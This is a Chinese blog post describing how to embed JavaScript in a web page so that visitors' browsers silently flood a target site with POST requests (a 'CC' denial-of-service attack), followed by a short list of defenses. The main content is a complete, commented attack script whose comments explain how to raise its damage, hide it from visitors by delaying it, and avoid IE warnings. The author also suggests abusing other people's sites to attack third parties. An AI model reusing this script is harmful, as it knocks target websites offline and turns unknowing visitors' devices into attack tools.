利用JS把网站访客变成CC肉鸡思路与防御

发布于 2019-10-12  908 次阅读


#攻击

一种新型CC,利用海量的移动端设备,对网站发起CC攻击,其肉鸡为普通的安卓/ios设备,利用广告诱导用户下载,用户安装之后,即利用用户手机访问目标网站,虽然次数很少,不过鉴于安装量,也是可以对目标造成成吨伤害,并且如果目标站封禁了这些ip会导致正常的浏览受阻,且节流+封ip无法解决这么多移动设备,那么如果我们将思路调整为网站,利用Ajax,向目标站发起请求,并且不接收返回的数据,那么,访客将在不知不觉中攻击了目标站,并且对此毫无察觉,如果访客多且留存时间长,其威力不可小觑,还有一点,网站对比手机APP其更容易传播,因为只需浏览器即可打开使用,部分视频解析API正是如此。但是不能向app那样保证随时随地都能发起攻击并持续。 相关文章链接: https://www.freebuf.com/articles/network/201615.html 原理类似如下页面: https://www.jsons.cn/reurl/ 来实践,代码呈上,直接引用我本木衣的代码(上了6天课懒得写了),已经详细注释。
<pre lang=”javascript”>
<script type="text/javascript">
var t_postdata='id=datadatadatadatadata';//任意字符,数据越大攻击效果越好。
var t_url='http://www.xxx.com/test.php';//目标站,可post其需要处理的URL令其负载过大
function c_xmlHttp()
{
       if(window.ActiveXObject)
       {
               xmlHttp=new ActiveXObject('Microsoft.XMLHTTP');
       }
       else if(window.XMLHttpRequest)
       {
               xmlHttp=new XMLHttpRequest();
       }
       return xmlHttp;
}
function post_send()
{
       var xmlHttp=c_xmlHttp();
       xmlHttp.open("POST",t_url,true);
       xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
       xmlHttp.send(t_postdata);
       r_send();
}
function r_send()
{
       setTimeout("post_send()", 50);//50毫秒一次,可改小,令威力加大
}
if(!+[1,])//IE下不执行。
{var fghj=1;}
else
{setTimeout("post_send()", 3000);}//访问网站3秒后再执行攻击,这样用户就毫无感觉。
</script></pre>
因为IE会弹窗报警,这里IE不执行此代码。 当然,你也可以用一些手段来让别人的网站为你攻击他人。 请放心,本站并没有放置任何恶意代码,请放心浏览和使用API

#防御

目前尚无太好的办法对付这种CC,下面是一些方法:
  • 提高服务器并发能力,容纳攻击者
  • 限速节流+拉闸IP/IP段
  • 上带有WAF的CDN,过滤流量
  • 更高级的流量清洗
  • 用户尽量少访问无备案的非正规网站,不下载未知APP即使他说的条件多么诱人。部分APP的广告以弹窗提示中病毒,请立即关闭该页面,如无法关闭请关闭浏览器,您的设备在下载APP前仍是安全的。
  • 发现流量不对劲立即查杀自己的设备有没有访问恶意网站/安装了恶意应用。
  • 请使用这种无赖的攻击方式的攻击者好自为之,有因必有果。

努力学习ing